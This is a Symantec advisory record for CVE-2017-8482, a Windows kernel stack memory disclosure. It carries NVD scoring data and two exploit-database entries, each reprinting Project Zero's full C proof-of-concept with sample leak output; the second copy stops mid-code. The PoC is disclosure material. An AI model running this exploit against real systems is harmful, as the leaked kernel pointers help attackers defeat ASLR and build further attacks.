Microsoft Windows Kernel CVE-2017-8482 Local Information Disclosure Vulnerability
2017-06-13T00:00:00
ID SMNTC-98858 Type symantec Reporter Symantec Security Response Modified 2017-06-13T00:00:00
Description
Microsoft Windows is prone to a local information-disclosure vulnerability. A local attacker can leverage this issue to disclose sensitive information that may aid in further attacks.
Technologies Affected
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016
Recommendations
Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.
Ensure that only trusted users have local, interactive access to affected computers.
Updates are available. Please see the references or vendor advisory for more information.
{"cve": [{"lastseen": "2020-10-03T13:07:50", "description": "The kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an authenticated attacker to obtain information via a specially crafted application. aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-8492, CVE-2017-8491, CVE-2017-8490, CVE-2017-8489, CVE-2017-8488, CVE-2017-8485, CVE-2017-8483, CVE-2017-8480, CVE-2017-8479, CVE-2017-8478, CVE-2017-8476, CVE-2017-8474, CVE-2017-8469, CVE-2017-8462, CVE-2017-0300, CVE-2017-0299, and CVE-2017-0297.", "edition": 3, "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-06-15T01:29:00", "title": "CVE-2017-8482", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8482"], "modified": "2019-03-18T21:00:00", "cpe": ["cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", 
"cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2017-8482", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8482", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-12T03:54:44", "edition": 1, "description": "Exploit for windows platform in category dos / poc", "published": "2017-06-21T00:00:00", "title": "Microsoft Windows - nt!KiDispatchException Kernel Stack Memory Disclosure in Exception Handling Expl", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8482"], "modified": "2017-06-21T00:00:00", "href": "https://0day.today/exploit/description/28004", "id": "1337DAY-ID-28004", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1177\r\n \r\nAccording to our tests, the generic exception dispatching code present in the Windows kernel (Windows 7-10) discloses portions of uninitialized kernel stack memory to user-mode clients via the CONTEXT structure set up for 
the ring-3 exception handlers.\r\n \r\nThe attached proof-of-concept program can be used to reproduce the issue. It works by first spraying a full page of the kernel stack with a 0x41 byte ('A') using the nt!NtMapUserPhysicalPages system call (see [1]), then also spraying a page of user-mode stack (to recognize any false-positives) with a 0x78 ('x') byte, followed by raising an exception with a RaiseException() call and dumping the contents of the CONTEXT structure provided to the unhandled exception filter function. After running the program, we should observe the 'A' byte on output in place of disclosed kernel memory.\r\n \r\nOn most tested platforms (Windows 7 64-bit, Windows 10 32/64-bit), running the 32-bit proof-of-concept program reveals 4 bytes of kernel stack memory at offset 0x88 of the structure. An example output is as follows:\r\n \r\n--- cut ---\r\n00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................\r\n00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00[41 41 41 41]2b 00 00 00 ........AAAA+...\r\n00000090: 53 00 00 00 2b 00 00 00 2b 00 00 00 50 fe 32 00 S...+...+...P.2.\r\n000000a0: 84 fd 32 00 00 e0 fd 7e 00 00 00 00 85 3c 1d 59 ..2....~.....<.Y\r\n000000b0: 1c fd 32 00 6c fd 32 00 4f c5 72 75 23 00 00 00 ..2.l.2.O.ru#...\r\n000000c0: 46 02 00 00 1c fd 32 00 2b 00 00 00 7f 02 00 00 F.....2.+.......\r\n000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000000e0: 00 00 00 00 80 1f 00 
00 ff ff 00 00 00 00 00 00 ................\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
................\r\n00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................\r\n--- cut ---\r\n \r\nOffset 0x88 of the CONTEXT structure on x86 corresponds to the 32-bit CONTEXT.FloatSave.Cr0NpxState field, which appears to remain in an uninitialized state before being copied to user-mode. We have tested that with the kernel stack spraying disabled, these bytes contain varying values originating from the kernel memory space.\r\n \r\nOn Windows 7 32-bit, we're observing a slightly different output:\r\n \r\n--- cut ---\r\n00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................\r\n00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000090: 3b 00 00 00 23 00 00 00 23 00 00 00 0c fe 2a 00 ;...#...#.....*.\r\n000000a0: 40 fd 2a 00 00 f0 fd 7f 74 6c 8e 77 89 bb c8 38 @.*.....tl.w...8\r\n000000b0: d8 fc 2a 00 28 fd 2a 00 5d 84 c3 75 1b 00 00 00 ..*.(.*.]..u....\r\n000000c0: 46 02 00 00 d8 fc 2a 00 23 00 00 00 7f 02 00 00 F.....*.#.......\r\n000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 
00 00 ................\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000280: 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA\r\n000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? AAAAAAAAAAAA....\r\n--- cut ---\r\n \r\nHere, we can see that 32 bytes from the kernel stack are leaked at the end of the CONTEXT structure, which correspond to the last bytes of the CONTEXT.ExtendedRegisters array. We have confirmed that when the spraying function is not invoked, this memory region discloses valid kernel-mode pointers.\r\n \r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.\r\n*/\r\n \r\n#include <Windows.h>\r\n#include <cstdio>\r\n \r\nextern \"C\"\r\nULONG WINAPI NtMapUserPhysicalPages(\r\n PVOID BaseAddress,\r\n ULONG NumberOfPages,\r\n PULONG PageFrameNumbers\r\n);\r\n \r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? 
\");\r\n }\r\n }\r\n \r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n}\r\n \r\nVOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {\r\n for (ULONG i = 0; i < size; i++) {\r\n ptr[i] = byte;\r\n }\r\n}\r\n \r\nVOID SprayKernelStack() {\r\n // Buffer allocated in static program memory, hence doesn't touch the local stack.\r\n static BYTE buffer[4096];\r\n \r\n // Fill the buffer with 'A's and spray the kernel stack.\r\n MyMemset(buffer, 'A', sizeof(buffer));\r\n NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);\r\n \r\n // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.\r\n MyMemset(buffer, 'B', sizeof(buffer));\r\n}\r\n \r\nVOID SprayUserStack() {\r\n // Buffer allocated from the user-mode stack.\r\n BYTE buffer[4096];\r\n MyMemset(buffer, 'x', sizeof(buffer));\r\n}\r\n \r\nLONG WINAPI MyUnhandledExceptionFilter(\r\n _In_ struct _EXCEPTION_POINTERS *ExceptionInfo\r\n ) {\r\n PrintHex((PBYTE)ExceptionInfo->ContextRecord, sizeof(CONTEXT));\r\n return EXCEPTION_CONTINUE_EXECUTION;\r\n}\r\n \r\nint main() {\r\n SetUnhandledExceptionFilter(MyUnhandledExceptionFilter);\r\n \r\n SprayKernelStack();\r\n SprayUserStack();\r\n \r\n RaiseException(1337, 0, 0, NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/28004"}], "exploitdb": [{"lastseen": "2017-06-21T20:15:12", "description": "Microsoft Windows - 'nt!KiDispatchException' Kernel Stack Memory Disclosure in Exception Handling. CVE-2017-8482. 
Dos exploit for Windows platform", "published": "2017-06-21T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'nt!KiDispatchException' Kernel Stack Memory Disclosure in Exception Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8482"], "modified": "2017-06-21T00:00:00", "id": "EDB-ID:42220", "href": "https://www.exploit-db.com/exploits/42220/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1177\r\n\r\nAccording to our tests, the generic exception dispatching code present in the Windows kernel (Windows 7-10) discloses portions of uninitialized kernel stack memory to user-mode clients via the CONTEXT structure set up for the ring-3 exception handlers.\r\n\r\nThe attached proof-of-concept program can be used to reproduce the issue. It works by first spraying a full page of the kernel stack with a 0x41 byte ('A') using the nt!NtMapUserPhysicalPages system call (see [1]), then also spraying a page of user-mode stack (to recognize any false-positives) with a 0x78 ('x') byte, followed by raising an exception with a RaiseException() call and dumping the contents of the CONTEXT structure provided to the unhandled exception filter function. After running the program, we should observe the 'A' byte on output in place of disclosed kernel memory.\r\n\r\nOn most tested platforms (Windows 7 64-bit, Windows 10 32/64-bit), running the 32-bit proof-of-concept program reveals 4 bytes of kernel stack memory at offset 0x88 of the structure. 
An example output is as follows:\r\n\r\n--- cut ---\r\n00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................\r\n00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00[41 41 41 41]2b 00 00 00 ........AAAA+...\r\n00000090: 53 00 00 00 2b 00 00 00 2b 00 00 00 50 fe 32 00 S...+...+...P.2.\r\n000000a0: 84 fd 32 00 00 e0 fd 7e 00 00 00 00 85 3c 1d 59 ..2....~.....<.Y\r\n000000b0: 1c fd 32 00 6c fd 32 00 4f c5 72 75 23 00 00 00 ..2.l.2.O.ru#...\r\n000000c0: 46 02 00 00 1c fd 32 00 2b 00 00 00 7f 02 00 00 F.....2.+.......\r\n000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 00 00 ................\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................\r\n--- cut ---\r\n\r\nOffset 0x88 of the CONTEXT structure on x86 corresponds to the 32-bit CONTEXT.FloatSave.Cr0NpxState field, which appears to remain in an uninitialized state before being copied to user-mode. 
We have tested that with the kernel stack spraying disabled, these bytes contain varying values originating from the kernel memory space.\r\n\r\nOn Windows 7 32-bit, we're observing a slightly different output:\r\n\r\n--- cut ---\r\n00000000: 7f 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................\r\n00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................\r\n00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000090: 3b 00 00 00 23 00 00 00 23 00 00 00 0c fe 2a 00 ;...#...#.....*.\r\n000000a0: 40 fd 2a 00 00 f0 fd 7f 74 6c 8e 77 89 bb c8 38 @.*.....tl.w...8\r\n000000b0: d8 fc 2a 00 28 fd 2a 00 5d 84 c3 75 1b 00 00 00 ..*.(.*.]..u....\r\n000000c0: 46 02 00 00 d8 fc 2a 00 23 00 00 00 7f 02 00 00 F.....*.#.......\r\n000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000000e0: 00 00 00 00 80 1f 00 00 ff ff 00 00 00 00 00 00 ................\r\n000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 ................\r\n00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA\r\n000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? AAAAAAAAAAAA....\r\n--- cut ---\r\n\r\nHere, we can see that 32 bytes from the kernel stack are leaked at the end of the CONTEXT structure, which correspond to the last bytes of the CONTEXT.ExtendedRegisters array. 
We have confirmed that when the spraying function is not invoked, this memory region discloses valid kernel-mode pointers.\r\n\r\nRepeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.\r\n*/\r\n\r\n#include <Windows.h>\r\n#include <cstdio>\r\n\r\nextern \"C\"\r\nULONG WINAPI NtMapUserPhysicalPages(\r\n PVOID BaseAddress,\r\n ULONG NumberOfPages,\r\n PULONG PageFrameNumbers\r\n);\r\n\r\nVOID PrintHex(PBYTE Data, ULONG dwBytes) {\r\n for (ULONG i = 0; i < dwBytes; i += 16) {\r\n printf(\"%.8x: \", i);\r\n\r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes) {\r\n printf(\"%.2x \", Data[i + j]);\r\n }\r\n else {\r\n printf(\"?? \");\r\n }\r\n }\r\n\r\n for (ULONG j = 0; j < 16; j++) {\r\n if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {\r\n printf(\"%c\", Data[i + j]);\r\n }\r\n else {\r\n printf(\".\");\r\n }\r\n }\r\n\r\n printf(\"\\n\");\r\n }\r\n}\r\n\r\nVOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {\r\n for (ULONG i = 0; i < size; i++) {\r\n ptr[i] = byte;\r\n }\r\n}\r\n\r\nVOID SprayKernelStack() {\r\n // Buffer allocated in static program memory, hence doesn't touch the local stack.\r\n static BYTE buffer[4096];\r\n\r\n // Fill the buffer with 'A's and spray the kernel stack.\r\n MyMemset(buffer, 'A', sizeof(buffer));\r\n NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);\r\n \r\n // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.\r\n MyMemset(buffer, 'B', 